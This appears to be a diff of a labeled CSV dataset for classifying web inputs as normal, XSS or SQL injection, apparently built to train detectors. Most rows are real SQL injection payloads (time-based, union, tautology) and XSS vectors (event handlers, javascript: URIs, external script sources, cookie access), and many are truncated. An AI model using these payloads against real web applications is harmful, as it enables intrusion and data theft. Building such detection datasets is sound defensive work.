then 1 else null end-,2,SQLi,21166 +"1 or row ( 1045,7562 ) > ( select count ( * ) ,con",2,SQLi,18631 "<meta http-equiv=""Content-Security-Policy"" content",1,XSS,179 -"select * from users where id = 1 or ""$&"" or 1 = 1 ",2,SQLi,11470 -1' ) ) as hpta where 5376 = 5376 waitfor delay '0:,2,SQLi,17559 --3084%' ) ) order by 1--,2,SQLi,13799 -<svg><script>/<@/>alert(1)</script>//INJECTX,1,XSS,9831 -"1%"" ) rlike ( select * from ( select ( sleep ( 5 )",2,SQLi,17175 -Select a game.,0,normal,24814 +select * from users where id = '1' union select !<,2,SQLi,11472 +1 ) ) as aqpy where 4027 = 4027 or 7417 = ( select,2,SQLi,17561 +"1 ) ) procedure analyse ( extractvalue ( 9255,conc",2,SQLi,13801 +<iframe/onload=alert(/INJECTX/)>,1,XSS,9833 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,17177 +Select an option.,0,normal,24811 "<a href=""&#x6a avascript:alert(1)"">XSS</a>",1,XSS,199 --4023 or ( 8779 = 5716 ) *5716,2,SQLi,14644 -1'|| ( select 'wszt' from dual where 6854 = 6854 a,2,SQLi,16933 -1' ) ) ) and 3580 = ( select count ( * ) from doma,2,SQLi,19724 -1%' ) ) ) or 8421 = ( select count ( * ) from gene,2,SQLi,12941 -"-3359 union all select 4675,4675,4675--",2,SQLi,21693 -1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch,2,SQLi,16269 -admin'or 1 = 1 or '' = ',2,SQLi,11773 -There are three funeral packages to choose from or,0,normal,25334 -"1"" and 7533 = 7533",2,SQLi,21066 -1' ) where 3703 = 3703 and 2716 = ( select count (,2,SQLi,17525 -1'+ ( select 'igoi' where 7823 = 7823 or 8421 = ( ,2,SQLi,13278 -"While their inventory consists of newer cards, suc",0,normal,25129 -"-8312%"" ) ) union all select 4972--",2,SQLi,15104 -"<SCRIPT/ SRC=""http://.rocks/.js""></SCRIPT>",1,XSS,7534 -"1%"" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) |",2,SQLi,20945 -1 ) ) as faxr where 7972 = 7972 or 1022 = ( select,2,SQLi,15856 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14646 +"1"" ) ) ) or 8421 = ( select count ( * ) from gener",2,SQLi,16935 +1' in boolean mode ) and 2388 = benchmark ( 500000,2,SQLi,19726 +1 order by 1--,2,SQLi,12943 +1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,21691 +"-3420 where 9681 = 9681 or make_set ( 2438 = 1977,",2,SQLi,16271 +"and 1 = ( if ( ( load_file ( char ( 110,46,101,120",2,SQLi,11775 +There is a small but very select collection of tre,0,normal,25331 +1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +cha,2,SQLi,21247 +1'+ ( select 'fpnz' where 1592 = 1592 and ( select,2,SQLi,17527 +1' in boolean mode ) and 5981 = 6700,2,SQLi,13280 +Whole Foods and Amazon announced that select organ,0,normal,25126 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,15106 +"<legend oncut=""alert(1)"" contenteditable>test</leg",1,XSS,7536 +( select ( case when ( 1570 = 6977 ) then 1 else 1,2,SQLi,20943 +1 ) where 8094 = 8094,2,SQLi,15858 "<div draggable=""true"" contenteditable>drag me</div",1,XSS,67 -"<blockquote oncut=""alert(1)"" contenteditable>test<",1,XSS,4713 -select * from users where id = '1' union select ( ,2,SQLi,11453 -1%' ) ) ) and char ( 107 ) ||char ( 121 ) ||char (,2,SQLi,15690 -Go and select.,0,normal,24788 -"<image oncopy=""alert(1)"" contenteditable>test</ima",1,XSS,5034 -<track onfocusout=alert(1) tabindex=1 id=x></track,1,XSS,6916 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2573 -Filter the posts,0,normal,22889 -"1"" ) as nqtn where 5606 = 5606 and 9660 = ( select",2,SQLi,20226 -"1', ( convert ( int, ( select char ( 113 ) +char (",2,SQLi,17007 -"West Elm: Up to 25% off select furniture, and 25% ",0,normal,25168 -<nextid onpointerenter=alert(1)>XSS</nextid>,1,XSS,6223 +"<listing onkeyup=""alert(1)"" contenteditable>test</",1,XSS,4715 +"; if not ( substring ( ( select @@version ) ,24,1 ",2,SQLi,11455 +"-7700%' ) union all select 5660,5660,5660,5660,566",2,SQLi,15692 +Careful selection.,0,normal,24785 +<image onpointerout=alert(1)>XSS</image>,1,XSS,5036 +<output id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6918 +<var onfocusout=alert(1) tabindex=1 id=x></var><in,1,XSS,2574 +Update the image.,0,normal,22886 +"1%"" ) ) ) rlike ( select * from ( select ( sleep (",2,SQLi,20228 +1' ) ) ) and 5556 = ( select count ( * ) from all_,2,SQLi,17009 +We've been asking respondents to select from the l,0,normal,25165 +"<caption onmouseenter=""alert(1)"">test</caption>",1,XSS,6225 <object onerror=javascript:javascript:alert(1)>,1,XSS,788 -"<table oncut=""alert(1)"" contenteditable>test</tabl",1,XSS,3333 -"{""id"":null,""name"":""Lileep""}",0,normal,27106 -<style>:target {color: red;}</style><colgroup id=x,1,XSS,6009 -"<small onmouseup=""alert(1)"">test</small>",1,XSS,8335 -1' in boolean mode ) or 8315 = ( select count ( * ,2,SQLi,16656 -tan,0,normal,23215 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,13449 -Where's the pharmacy?,0,normal,23503 -"<IMG SRC=x onsearch=""alert(String.fromCharCode(88,",1,XSS,1192 -1' ) and 4595 = 4595#,2,SQLi,12479 +<canvas onpointerdown=alert(1)>XSS</canvas>,1,XSS,3335 +"{""id"":null,""name"":""GourgeistSmall Size""}",0,normal,27104 +<figure id=x tabindex=1 onfocusin=alert(1)></figur,1,XSS,6011 +"<b oncut=""alert(1)"" contenteditable>test</b>",1,XSS,8337 +"-4919 ) union all select 2608,2608,2608,2608,2608,",2,SQLi,16658 +power,0,normal,23212 +-6370' ) ) as sims where 9388 = 9388 union all sel,2,SQLi,13451 +Where's the taxi stand?,0,normal,23500 +"<IMG SRC=x onselect=""alert(String.fromCharCode(88,",1,XSS,1193 +1%' or 4915 = ( select count ( * ) from domain.dom,2,SQLi,12481 "<a href=""\xE2\x80\x87javascript:javascript:alert(1",1,XSS,516 -"1"" where 5845 = 5845 and 5556 = ( select count ( *",2,SQLi,16863 -"<em onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,4477 -AS INJECTX WHERE 1=1 AND 1=1#,2,SQLi,10233 -"1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 )",2,SQLi,21267 --1854' ) as fmmq where 7326 = 7326 or 3440 = cast ,2,SQLi,17418 -1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'zhhf' li,2,SQLi,21823 --2872 ) where 8797 = 8797 or 1 group by concat ( 0,2,SQLi,14623 -1%' ) waitfor delay '0:0:5'--,2,SQLi,18983 -"-3781 ) union all select 3916,3916,3916--",2,SQLi,17899 -"<sup onmousedown=""alert(1)"">test</sup>",1,XSS,6192 -1' ) as bscn where 6907 = 6907,2,SQLi,14176 -"RC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9",1,XSS,7238 -"<picture><source srcset=""validimage.png""><img onlo",1,XSS,5754 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2069 -"{""id"":null,""name"":""happened""}",0,normal,27588 -<plaintext id=x tabindex=1 onbeforedeactivate=aler,1,XSS,8237 -"1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,16253 -"1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105",2,SQLi,15906 -&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&q,1,XSS,1463 -1 ) ) as uqsi where 1644 = 1644 and 9198 = 9198--,2,SQLi,15208 -select ( case when ( 4393 = 2875 ) then 1 else 439,2,SQLi,18256 -"<figcaption onpaste=""alert(1)"" contenteditable>tes",1,XSS,4577 -"#goto,javascript:alert(1)"",",1,XSS,9857 -Insert the SIM card tray.,0,normal,22699 -<ins id=x tabindex=1 onfocusin=alert(1)></ins>,1,XSS,7350 -<svg id=x onfocus=alert(1)>,1,XSS,4819 -"1%"" ) ) procedure analyse ( extractvalue ( 9627,co",2,SQLi,21649 +-4699 ) as mymz where 3405 = 3405 or elt ( 1032 = ,2,SQLi,16865 +"<bdi onkeypress=""alert(1)"" contenteditable>test</b",1,XSS,4479 +AS INJECTX WHERE 1=1 AND 1=1--,2,SQLi,10235 +"1"" ) where 2367 = 2367",2,SQLi,21265 +select ( case when ( 1743 = 5698 ) then 1743 else ,2,SQLi,17420 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21821 +1' ) where 1363 = 1363 or char ( 68 ) ||char ( 69 ,2,SQLi,14625 +( select ( case when ( 4232 = 4232 ) then ( select,2,SQLi,18985 +"-5849 ) union all select 6168,6168,6168,6168,6168,",2,SQLi,17901 +"<small onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,6194 +1' where 2134 = 2134 rlike ( select ( case when ( ,2,SQLi,14178 +"<ruby oncontextmenu=""alert(1)"">test</ruby>",1,XSS,7240 +"<source onmouseover=""alert(1)"">test</source>",1,XSS,5756 +"SRC=# onmouseover=""alert(document.cookie)",1,XSS,2070 +Select a suitable color for your lighting conditio,0,normal,25656 +"<menu onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,8239 +1 ) ) as svhd where 9761 = 9761,2,SQLi,16255 +1 ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ,2,SQLi,15908 +&lt;A HREF=&quot;http://0102.0146.0007.00000223/&q,1,XSS,1464 +select ( case when ( 2717 = 2634 ) then 2717 else ,2,SQLi,15210 +"1' ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,18258 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4579 +"?alert(1)"",",1,XSS,9859 +Select the perfect dress.,0,normal,24283 +<style>:target {color: red;}</style><del id=x styl,1,XSS,7352 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4821 +Join race.,0,normal,23088 <script>$.getScript('https://google.com/')</script,1,XSS,221 -"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,12633 -1 where 9752 = 9752,2,SQLi,19938 -"-6075' union all select 9988,9988,9988,9988,9988,9",2,SQLi,21455 --4259' ) ) as usqu where 5419 = 5419 or elt ( 8325,2,SQLi,18861 -<big id=x tabindex=1 onactivate=alert(1)></big>,1,XSS,4249 -"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,18433 -"1, ( select ( case when ( 8392 = 8404 ) then 1 els",2,SQLi,17443 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6488 -"<A HREF=""http://0102.0146.0007.00000223/""></A>",1,XSS,7037 -<svg id=x;onload=alert(1)>,1,XSS,9457 -1' ) and ( select 2* ( if ( ( select * from ( sele,2,SQLi,12434 -"<textarea onmouseup=""alert(1)"">test</textarea>",1,XSS,5651 -1' where 9708 = 9708 or sleep ( 5 ) --,2,SQLi,17633 -Where's the bridge?,0,normal,23524 -Congratulations to those very good guys and @Julie,0,normal,26505 -1 ) where 3062 = 3062 or 8466 = benchmark ( 500000,2,SQLi,21836 -"<form onmouseenter=""alert(1)"">test</form>",1,XSS,2882 -1%' ) and 3754 = ( select upper ( xmltype ( chr ( ,2,SQLi,18062 -1' and 3754 = ( select upper ( xmltype ( chr ( 60 ,2,SQLi,21348 +"-8566"" ) as hnch where 3418 = 3418 union all selec",2,SQLi,12635 +1'|| ( select 'yezk' where 2097 = 2097,2,SQLi,19940 +"1"" ) where 8702 = 8702 union all select null,null,",2,SQLi,21453 +"1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,18863 +"<big draggable=""true"" ondragend=""alert(1)"">test</b",1,XSS,4251 +-6244' ) as szpd where 8445 = 8445 or 2724 in ( ( ,2,SQLi,18435 +1'|| ( select 'yydv' from dual where 9639 = 9639,2,SQLi,17445 +<noframes onpointermove=alert(1)>XSS</noframes>,1,XSS,6490 +"<menu oncut=""alert(1)"" contenteditable>test</menu>",1,XSS,7039 +<img src=1 alt=al lang=ert onerror=top[alt+lang](0,1,XSS,9459 +-6045 or 8919 = 2827--,2,SQLi,12436 +<datalist onblur=alert(1) tabindex=1 id=x></datali,1,XSS,5653 +"1"" ) ) as whyr where 9731 = 9731 rlike ( select * ",2,SQLi,17635 +Where's the waterfall?,0,normal,23521 +Fortnite servers are really bad today / today. Pro,0,normal,26502 +-4954' ) or 8571 = 8571--,2,SQLi,21834 +"<isindex onmouseup=""alert(1)"">test</isindex>",1,XSS,2883 +1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch,2,SQLi,18064 +1 ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ,2,SQLi,21346 "<a href=""data:text/html;base64_,<svg/onload=\u0061",1,XSS,902 -"1"" ) as pwvu where 8267 = 8267",2,SQLi,18982 -"<samp onpaste=""alert(1)"" contenteditable>test</sam",1,XSS,7165 -"( select * from generate_series ( 3906,3906,case w",2,SQLi,18681 -"select * from users where id = 1 or ""{ ( "" = 1 or ",2,SQLi,11595 -<map onpointermove=alert(1)>XSS</map>,1,XSS,2182 -<input3 onpointerdown=alert(1)>XSS</input3>,1,XSS,8489 -<script>window['alert'](0)</script>,1,XSS,9714 -"1"" ) ) and 8329 = 5584#",2,SQLi,18370 -"<noembed oncopy=""alert(1)"" contenteditable>test</n",1,XSS,8220 -"If none of these options suit you, you can select ",0,normal,26056 -Let's choose a destination for our getaway.,0,normal,23808 -"<u oncopy=""alert(1)"" contenteditable>test</u>",1,XSS,6773 -"{""id"":null,""firstName"":""Dexter"",""lastName"":""Tang"",",0,normal,27408 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,14437 -1' ) ) as oldh where 9551 = 9551 union all select ,2,SQLi,14679 -"or 0 = 0 #""",2,SQLi,11441 -1 ) as mpnj where 5049 = 5049,2,SQLi,22217 -"1"" and 6414 = ( select count ( * ) from rdb$fields",2,SQLi,16173 -Select travel.,0,normal,24649 -<ol id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,7258 -<template onpointerover=alert(1)>XSS</template>,1,XSS,2581 -"<s oncopy=""alert(1)"" contenteditable>test</s>",1,XSS,7967 -Select get.,0,normal,24561 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2157 -"<span onkeypress=""alert(1)"" contenteditable>test</",1,XSS,4341 -"-->'""/></sCript><deTailS open x="">"" ontoggle=(co\u",1,XSS,9563 +1 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||,2,SQLi,18984 +<style>:target {color:red;}</style><legend id=x st,1,XSS,7167 +"1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,18683 +select * from users where id = 1 + ( \. ) or 1 = 1,2,SQLi,11597 +<colgroup id=x tabindex=1 onbeforedeactivate=alert,1,XSS,2183 +"<figure onmousedown=""alert(1)"">test</figure>",1,XSS,8491 +<script>self['alert'](2)</script>,1,XSS,9716 +"1"" ) as jidc where 6093 = 6093 and 9198 = 9198--",2,SQLi,18372 +<em onpointerenter=alert(1)>XSS</em>,1,XSS,8222 +"If they are not well rooted, leave them until they",0,normal,26053 +"{""id"":null,""name"":""Butterfree""}",0,normal,26757 +"<noembed onmouseleave=""alert(1)"">test</noembed>",1,XSS,6775 +I want to select the right song for the occasion.,0,normal,23774 +"1"" ) ) as maxe where 5883 = 5883 union all select ",2,SQLi,14439 +1 ) rlike ( select ( case when ( 5477 = 7492 ) the,2,SQLi,14681 +) or ( 'x' = 'x,2,SQLi,11443 +1' ) as irsh where 4973 = 4973 or 7552 = ( select ,2,SQLi,22215 +1' ) where 1424 = 1424 and sleep ( 5 ) --,2,SQLi,16175 +Select drive.,0,normal,24646 +<header onpointerover=alert(1)>XSS</header>,1,XSS,7260 +"<title draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2582 +javascript:alert('');,1,XSS,7969 +Select buy.,0,normal,24558 +"<isindex oncut=""alert(1)"" contenteditable>test</is",1,XSS,2158 +"<IMG SRC=""jav&#x0A;ascript:alert('');"">",1,XSS,4343 +"<SCRIPT/XSS SRC=""http://google.com""></SCRIPT>",1,XSS,9565 "{""id"":null,""name"":""darkness""}",0,normal,27422 -1,0,normal,26650 -"1 where 1992 = 1992 union all select null,null--",2,SQLi,13744 -&#x00003c,1,XSS,1074 -1' ) where 1470 = 1470 and char ( 111 ) ||char ( 7,2,SQLi,17066 -"<content onkeyup=""alert(1)"" contenteditable>test</",1,XSS,4531 -"<blink onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,3160 -"{""id"":null,""firstName"":""Aimi"",""lastName"":""Linah"",""",0,normal,27479 -<style>:target {color: red;}</style><b id=x style=,1,XSS,2988 -<command onfocusout=alert(1) tabindex=1 id=x></com,1,XSS,1883 -"-7678 ) ) ) union all select 2622,2622,2622,2622,2",2,SQLi,18325 -1' ) ) and 3754 = ( select upper ( xmltype ( chr (,2,SQLi,19681 -"1%"" and sleep ( 5 ) and ""%"" = """,2,SQLi,19919 -<style>:target {color: red;}</style><track id=x st,1,XSS,5975 -<discard onpointerdown=alert(1)>XSS</discard>,1,XSS,3730 +1' ) as xskm where 3525 = 3525 and 2435 = 6513,2,SQLi,22354 +1' and 3707 = ( select count ( * ) from sysibm.sys,2,SQLi,13746 +&#x000003c,1,XSS,1075 +"-2953"" ) or 4493 = utl_inaddr.get_host_address ( c",2,SQLi,17068 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4533 +"<wbr onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3162 +Where's the jogging track?,0,normal,23597 +<svg><progress onload=alert(1)></progress>,1,XSS,2989 +"<fieldset oncopy=""alert(1)"" contenteditable>test</",1,XSS,1884 +"1%' ) ) union all select null,null,null,null,null,",2,SQLi,18327 +1'+ ( select bptu where 7356 = 7356 ( select ( cas,2,SQLi,19683 +1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ,2,SQLi,19921 +<meta id=x tabindex=1 onfocus=alert(1)></meta>,1,XSS,5977 +"<th onkeyup=""alert(1)"" contenteditable>test</th>",1,XSS,3732 "<a href=""\xC2\xA0javascript:javascript:alert(1)"" i",1,XSS,491 -"<IMG SRC=x onpopstate=""alert(String.fromCharCode(8",1,XSS,1182 -&lt;DIV STYLE=&quot;background-image: url(javascri,1,XSS,1376 -<style>:target {color: red;}</style><samp id=x sty,1,XSS,5015 -1 ) and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,16235 --1470' ) ) ) or 9323 = 9323#,2,SQLi,17011 -"<q onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,4759 -ORDER BY 1,2,SQLi,10305 -"{""id"":null,""name"":""Magnadramon""}",0,normal,27143 -<marquee onpointerleave=alert(1)>XSS</marquee>,1,XSS,6041 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2842 -"<fieldset draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,4181 -1 order by 1#,2,SQLi,18646 -<bdi onpointerout=alert(1)>XSS</bdi>,1,XSS,4087 -Yet the mile is run now only at select meets.,0,normal,25107 -"<svg onclick=""alert(1)"">test</svg>",1,XSS,2888 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8877 -"-3282' ) union all select 9002,9002,9002,9002,9002",2,SQLi,20924 -"1' ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,12272 -"<p draggable=""true"" ondrag=""alert(1)"">test</p>",1,XSS,6672 -"make_set ( 2672 = 2672,5440 )",2,SQLi,14998 -<img src=http://www.google.fr/images/srpr/logo3w.p,1,XSS,9212 -"-4350"" ) ) as mmwq where 9801 = 9801 or ( 8520 = 2",2,SQLi,17751 -Select trip.,0,normal,24708 -1 where 3354 = 3354,2,SQLi,12582 -"-9110"" ) ) union all select 2263,2263,2263,2263,22",2,SQLi,19024 -"{""id"":null,""firstName"":""Yan Feng"",""lastName"":""Yee""",0,normal,26888 -<html onfocusout=alert(1) tabindex=1 id=x></html><,1,XSS,5603 -"Cameron Forni, who created Select brand in 2015, w",0,normal,26295 -"1%"" ) and 6969 = ( select 6969 from pg_sleep ( 5 )",2,SQLi,13922 -"<command draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,5731 -"1"" and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14746 -"<datalist onmouseout=""alert(1)"">test</datalist>",1,XSS,5297 -Let's choose a destination for our upcoming vacati,0,normal,23851 -1'+ ( select ophz where 9158 = 9158 rlike ( select,2,SQLi,12980 -1 ) as bidc where 5268 = 5268 and ( select * from ,2,SQLi,19323 -I want to select a movie to watch tonight.,0,normal,23965 -Create a quiz.,0,normal,22887 -1'+ ( select ggah where 3263 = 3263 and 6240 = ( ',2,SQLi,17697 -1)) or sleep(__TIME__)#,2,SQLi,10172 -"1"" and 8635 = ( select count ( * ) from generate_s",2,SQLi,20919 -or sleep(__TIME__)#,2,SQLi,10066 -or 0 = 0 #,2,SQLi,11539 -<svg><th onload=alert(1)></th>,1,XSS,7670 -<strong onblur=alert(1) tabindex=1 id=x></strong><,1,XSS,6870 -"If you want access to the comforts of home, select",0,normal,26043 +"<IMG SRC=x onresize=""alert(String.fromCharCode(88,",1,XSS,1183 +&lt;DIV STYLE=&quot;background-image: url(&amp;#1;,1,XSS,1377 +<style>:target {color:red;}</style><td id=x style=,1,XSS,5017 +"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,16237 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,17013 +"<image onmouseover=""alert(1)"">test</image>",1,XSS,4761 +ORDER BY 3,2,SQLi,10307 +It premieres on Netflix and in select theaters on ,0,normal,25957 +"<tfoot oncut=""alert(1)"" contenteditable>test</tfoo",1,XSS,6043 +<style>:target {color: red;}</style><style id=x st,1,XSS,2843 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4183 +-9340 ) where 5462 = 5462 or 3038 = 3038,2,SQLi,18648 +"<html draggable=""true"" ondrag=""alert(1)"">test</htm",1,XSS,4089 +you are hence selected to do sth,0,normal,25104 +"<menuitem onmouseleave=""alert(1)"">test</menuitem>",1,XSS,2889 +<thead onpointerleave=alert(1)>XSS</thead>,1,XSS,8879 +"-1134"" union all select 4865,4865,4865,4865,4865#",2,SQLi,20926 +1 ) as biup where 1414 = 1414 union all select nul,2,SQLi,12274 +<frame id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,6674 +"1 procedure analyse ( extractvalue ( 9255,concat (",2,SQLi,15000 +<input autofocus onblur=alert(1)>,1,XSS,9214 +1' ) order by 1--,2,SQLi,17753 +Select van.,0,normal,24705 +"-3853"" ) where 4626 = 4626 union all select 4626,4",2,SQLi,12584 +"1"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""zx",2,SQLi,19026 +"{""id"":null,""name"":""hurry ought""}",0,normal,26885 +"<dir onkeydown=""alert(1)"" contenteditable>test</di",1,XSS,5605 +Care should be taken in planting to select a spot ,0,normal,26292 +-3362' where 6567 = 6567 or 1 group by concat ( 0x,2,SQLi,13924 +"<IMG SRC="" &#14; javascript:alert('');"">",1,XSS,5733 +"1 ) where 2044 = 2044 or elt ( 6272 = 6272,sleep (",2,SQLi,14748 +"<table draggable=""true"" ondrag=""alert(1)"">test</ta",1,XSS,5299 +Delete files.,0,normal,23010 +-7248' ) where 4626 = 4626 or 1 group by concat ( ,2,SQLi,12982 +1' ) ) as nsfx where 9553 = 9553 rlike sleep ( 5 ),2,SQLi,19325 +"{""id"":null,""firstName"":""Juay"",""lastName"":""Yew Hai""",0,normal,26794 +Delete the tweet.,0,normal,22884 +"1' union all select null,null,null,null,null,null,",2,SQLi,17699 +hi or a=a,2,SQLi,10174 +1' ) ) ) and 6969 = ( select 6969 from pg_sleep ( ,2,SQLi,20921 +declare @q nvarchar (200) 0x730065006c00650063 ...,2,SQLi,10068 +admin' ) or '1' = '1'--,2,SQLi,11541 +"<noembed onmouseover=""alert(1)"">test</noembed>",1,XSS,7672 +<style>:target {color: red;}</style><datalist id=x,1,XSS,6872 +"{""id"":null,""firstName"":""Heng Fok"",""lastName"":""Wong",0,normal,27554 "{""id"":null,""name"":""Bengal Tiger""}",0,normal,27578 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,12993 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10473 -and 1='1,2,SQLi,9944 -<button onOutOfSync=javascript:alert(1)>,1,XSS,9644 --2549' ) as zfnf where 1993 = 1993 union all selec,2,SQLi,14893 -"1' ) procedure analyse ( extractvalue ( 5840,conca",2,SQLi,12662 -"{""id"":null,""firstName"":""Ng"",""lastName"":""Hui"",""addr",0,normal,27241 -<th onpointerenter=alert(1)>XSS</th>,1,XSS,6682 -<menu onpointerover=alert(1)>XSS</menu>,1,XSS,5429 -<iframe id=%22ifra%22 src=%22/%22></iframe> <scrip,1,XSS,9191 -<datalist onfocusout=alert(1) tabindex=1 id=x></da,1,XSS,3787 -googlecom,0,normal,27359 -<style>@keyframes slidein {}</style><shadow style=,1,XSS,1785 -<picture onpointerdown=alert(1)>XSS</picture>,1,XSS,7117 -"-1710"" ) ) as cvky where 1858 = 1858 union all sel",2,SQLi,16879 -"<style>@keyframes x{}</style><applet style=""animat",1,XSS,4684 -"insert into users(login, password, level) values( ",2,SQLi,10047 -1'|| ( select 'zrea' from dual where 1223 = 1223 o,2,SQLi,21323 -<form onpointerenter=alert(1)>XSS</form>,1,XSS,2039 -select case when 8514 = 3207 then 1 else null end-,2,SQLi,20426 -<script>alert(1)<!–,1,XSS,9282 --3752%' union all select 9351--,2,SQLi,19282 --1459' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5,2,SQLi,22375 --6045 or 8919 = 2827--,2,SQLi,12436 -It is plain that if the good that is to be known i,0,normal,25961 -"<select onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,7877 -"<form onmouseout=""alert(1)"">test</form>",1,XSS,3341 -"1"" ) ) as tljw where 8474 = 8474 and 6240 = ( 'qqp",2,SQLi,19038 -You can also select from special pages meant for d,0,normal,25099 -"<meter onclick=""alert(1)"">test</meter>",1,XSS,5912 -"To do this, tap and hold the highlight, select ""Ed",0,normal,25272 -"{""id"":null,""name"":""start behind""}",0,normal,26747 -"<pre onmousedown=""alert(1)"">test</pre>",1,XSS,8515 -"<style>:target {color:red;}</style><b id=x style=""",1,XSS,2032 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,17198 -"<section draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,7236 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,12756 -1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240,2,SQLi,15328 -where,0,normal,26529 -"1"" ) as esks where 1138 = 1138",2,SQLi,13984 -&#x00003c;,1,XSS,1080 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,18611 -"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,15452 -Carefully select the items.,0,normal,24475 -"-6254%' ) ) ) or 1 group by concat ( 0x7171706a71,",2,SQLi,17727 -Where did you find that inspiring artwork?,0,normal,23776 -"1"" ) ) ) and 7135 = 8805#",2,SQLi,18204 -"-1368 ) ) union all select 1310,1310,1310,1310,131",2,SQLi,19646 -<svg><image href=1 onerror=alert(1)>,1,XSS,5650 -"-4970' ) union all select 4625,4625,4625,4625,4625",2,SQLi,15301 -Join us for a meeting.,0,normal,22996 -"1' in boolean mode ) or elt ( 5873 = 5873,sleep ( ",2,SQLi,14507 -<sub id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,3863 -"<div onmouseout=""alert(1)"">test</div>",1,XSS,2937 -<svg><br onload=alert(1)></br>,1,XSS,3918 -">""'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26",1,XSS,1690 -"1 and elt ( 1210 = 1210,sleep ( 5 ) ) -- ommf",2,SQLi,14348 -"<SCRIPT a="">"" '' SRC=""httx://xss.rocks/xss.js""></S",1,XSS,306 -"<sup onmouseover=""alert(1)"">test</sup>",1,XSS,4057 -1 ) ) ( select ( case when ( 4587 = 4587 ) then re,2,SQLi,19825 -select ( case when ( 7594 = 8086 ) then 7594 else ,2,SQLi,19384 --5516'+ ( select 'bmlv' where 7188 = 7188 union al,2,SQLi,22080 -<p/onclick=alert(/INJECTX/)>a,1,XSS,9838 -"1 ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d4",2,SQLi,17616 -"data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+",1,XSS,9707 -<element onpointerup=alert(1)>XSS</element>,1,XSS,2314 -Select your objective.,0,normal,24844 -1' ) ) ) and 2006 = 2006,2,SQLi,21541 -Join the discussion about the latest book.,0,normal,22918 -She has also coached national select teams for U.S,0,normal,25557 -1 ) where 9708 = 9708,2,SQLi,20706 -"</html>//[""'`-->]]>]</div>",1,XSS,9031 -<dd id=x tabindex=1 onfocus=alert(1)></dd>,1,XSS,2063 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6471 -"-9505' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, (",2,SQLi,17401 -<object id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,6478 -1' in boolean mode ) ( select ( case when ( 4587 =,2,SQLi,20284 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,19952 -"<listing oncopy=""alert(1)"" contenteditable>test</l",1,XSS,5453 -"WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11280 -Save $50 on select Bose headphones at Target See D,0,normal,25731 -admin' or '1'='1'#,2,SQLi,9907 -<listing id=x tabindex=1 